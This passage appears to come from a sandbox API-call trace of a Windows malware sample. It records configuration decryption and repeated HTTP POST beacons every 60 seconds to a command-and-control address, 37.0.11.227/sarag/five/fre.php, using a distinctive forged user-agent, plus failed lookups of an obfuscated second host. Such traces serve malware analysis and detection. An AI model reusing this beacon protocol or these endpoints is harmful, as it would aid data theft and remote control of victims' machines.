szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.167] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.168] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0208.181] GetProcessHeap () returned 0x690000 [0208.181] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0208.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.182] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0208.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.183] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.184] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.184] GetProcessHeap () returned 0x690000 [0208.185] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0208.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.186] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0208.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.187] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0208.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.188] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0208.188] GetProcessHeap () returned 0x690000 [0208.189] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0208.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.190] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0208.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.191] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0208.194] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.194] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0208.200] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.200] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0208.200] GetProcessHeap () returned 0x690000 [0208.200] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0208.201] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0208.201] GetProcessHeap () returned 0x690000 [0208.201] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab400 [0208.201] socket (af=2, type=1, protocol=6) returned 0x4a8 [0208.201] connect (s=0x4a8, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0208.229] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0208.229] GetProcessHeap () returned 0x690000 [0208.229] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0208.229] GetProcessHeap () returned 0x690000 [0208.229] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0208.230] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0208.231] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0208.231] GetProcessHeap () returned 0x690000 [0208.231] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af5c0 [0208.231] GetProcessHeap () returned 0x690000 [0208.232] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0208.232] GetProcessHeap () returned 0x690000 [0208.232] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0208.232] GetProcessHeap () returned 0x690000 [0208.232] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0208.233] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0208.234] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0208.234] GetProcessHeap () returned 0x690000 [0208.234] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0208.234] GetProcessHeap () returned 0x690000 [0208.234] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0208.234] send (s=0x4a8, buf=0x6ab500*, len=242, flags=0) returned 242 [0208.235] send (s=0x4a8, buf=0x6aba40*, len=159, flags=0) returned 159 [0208.235] GetProcessHeap () returned 0x690000 [0208.235] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0208.235] recv (in: s=0x4a8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0208.308] GetProcessHeap () returned 0x690000 [0208.309] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0208.309] GetProcessHeap () returned 0x690000 [0208.310] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0208.310] GetProcessHeap () returned 0x690000 [0208.310] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af5c0 | out: hHeap=0x690000) returned 1 [0208.310] GetProcessHeap () returned 0x690000 [0208.311] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0208.311] closesocket (s=0x4a8) returned 0 [0208.312] GetProcessHeap () returned 0x690000 [0208.312] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab400 | out: hHeap=0x690000) returned 1 [0208.312] GetProcessHeap () returned 0x690000 [0208.312] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0208.312] GetProcessHeap () returned 0x690000 [0208.312] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0208.312] GetProcessHeap () returned 0x690000 [0208.313] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0208.313] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x680) returned 0x4a8 [0208.315] Sleep (dwMilliseconds=0xea60) [0208.316] GetProcessHeap () returned 0x690000 [0208.316] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0208.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.317] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.323] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0208.332] GetProcessHeap () returned 0x690000 [0208.332] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0208.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.333] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0208.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.334] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.335] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.335] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.335] GetProcessHeap () returned 0x690000 [0208.336] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0208.337] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.337] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0208.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.338] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0208.340] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.340] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0208.340] GetProcessHeap () returned 0x690000 [0208.340] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0208.341] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.341] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0208.342] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.342] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0208.343] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.344] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0208.344] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.345] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0208.345] GetProcessHeap () returned 0x690000 [0208.345] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0208.348] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0208.349] GetProcessHeap () returned 0x690000 [0208.349] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0208.349] GetProcessHeap () returned 0x690000 [0208.349] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0208.350] GetProcessHeap () returned 0x690000 [0208.350] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0208.350] GetProcessHeap () returned 0x690000 [0208.350] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0208.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.351] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.357] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0208.364] GetProcessHeap () returned 0x690000 [0208.364] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0208.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.365] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0208.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.366] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.367] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.367] GetProcessHeap () returned 0x690000 [0208.368] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0208.369] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.369] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0208.370] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.370] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0208.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.371] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0208.371] GetProcessHeap () returned 0x690000 [0208.371] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0208.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.373] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0208.373] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.374] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0208.375] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.375] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0208.382] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.382] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0208.382] GetProcessHeap () returned 0x690000 [0208.382] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0208.382] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0208.382] GetProcessHeap () returned 0x690000 [0208.382] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0208.382] socket (af=2, type=1, protocol=6) returned 0x4ac [0208.383] connect (s=0x4ac, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0208.415] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0208.415] GetProcessHeap () returned 0x690000 [0208.415] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0208.415] GetProcessHeap () returned 0x690000 [0208.415] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0208.416] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0208.417] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0208.417] GetProcessHeap () returned 0x690000 [0208.417] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0208.417] GetProcessHeap () returned 0x690000 [0208.418] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0208.418] GetProcessHeap () returned 0x690000 [0208.418] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0208.418] GetProcessHeap () returned 0x690000 [0208.418] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0208.419] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0208.420] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0208.420] GetProcessHeap () returned 0x690000 [0208.420] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0208.420] GetProcessHeap () returned 0x690000 [0208.420] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0208.420] send (s=0x4ac, buf=0x6ab500*, len=242, flags=0) returned 242 [0208.421] send (s=0x4ac, buf=0x6aba40*, len=159, flags=0) returned 159 [0208.421] GetProcessHeap () returned 0x690000 [0208.421] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0208.421] recv (in: s=0x4ac, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0208.504] GetProcessHeap () returned 0x690000 [0208.504] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0208.505] GetProcessHeap () returned 0x690000 [0208.505] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0208.506] GetProcessHeap () returned 0x690000 [0208.506] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0208.506] GetProcessHeap () returned 0x690000 [0208.506] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0208.506] closesocket (s=0x4ac) returned 0 [0208.507] GetProcessHeap () returned 0x690000 [0208.507] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0208.507] GetProcessHeap () returned 0x690000 [0208.507] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0208.507] GetProcessHeap () returned 0x690000 [0208.508] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0208.508] GetProcessHeap () returned 0x690000 [0208.508] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0208.508] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x314) returned 0x4ac [0208.510] Sleep (dwMilliseconds=0xea60) [0208.511] GetProcessHeap () returned 0x690000 [0208.512] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0208.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.514] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.523] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0208.535] GetProcessHeap () returned 0x690000 [0208.535] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0208.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.537] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0208.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.538] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.539] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.539] GetProcessHeap () returned 0x690000 [0208.539] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0208.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.540] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0208.548] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.548] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0208.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.551] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0208.551] GetProcessHeap () returned 0x690000 [0208.551] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0208.552] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.552] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0208.553] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.553] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0208.554] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.554] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0208.555] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.555] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0208.555] GetProcessHeap () returned 0x690000 [0208.555] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0208.555] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0208.555] GetProcessHeap () returned 0x690000 [0208.556] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0208.556] GetProcessHeap () returned 0x690000 [0208.556] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0208.556] GetProcessHeap () returned 0x690000 [0208.556] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0208.556] GetProcessHeap () returned 0x690000 [0208.556] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0208.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.558] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.564] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0208.570] GetProcessHeap () returned 0x690000 [0208.570] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0208.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.571] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0208.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.572] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.573] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.573] GetProcessHeap () returned 0x690000 [0208.573] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0208.574] 